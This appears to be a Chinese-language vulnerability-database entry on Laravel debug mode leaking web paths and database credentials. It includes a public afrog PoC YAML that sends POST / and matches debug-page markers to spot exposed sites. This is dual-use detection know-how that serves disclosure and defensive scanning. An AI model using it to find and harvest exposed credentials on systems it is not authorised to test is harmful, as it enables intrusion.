laravel-debug-info-leak: Laravel Debug Info Leak

日期: 2025-09-01 | 影响软件: Laravel | POC: 已公开

漏洞描述

Laravel 开启 Debug mode,可能泄露web路径、数据库账号密码等敏感信息

PoC代码[已公开]

id: laravel-debug-info-leak

info:
    name: Laravel Debug Info Leak
    author: Dem0ns (https://github.com/dem0ns)
    severity: high
    verified: true
    description: |
        Laravel 开启 Debug mode,可能泄露web路径、数据库账号密码等敏感信息

rules:
    r0:
        request:
            method: POST
            path: /
        expression: response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment & details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php"))
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/disclosure/laravel-debug-info-leak.yaml

相关漏洞推荐